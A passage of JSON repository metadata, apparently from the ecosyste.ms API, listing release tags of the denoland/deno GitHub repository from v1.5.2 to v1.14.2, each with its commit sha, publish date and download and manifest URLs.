4.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.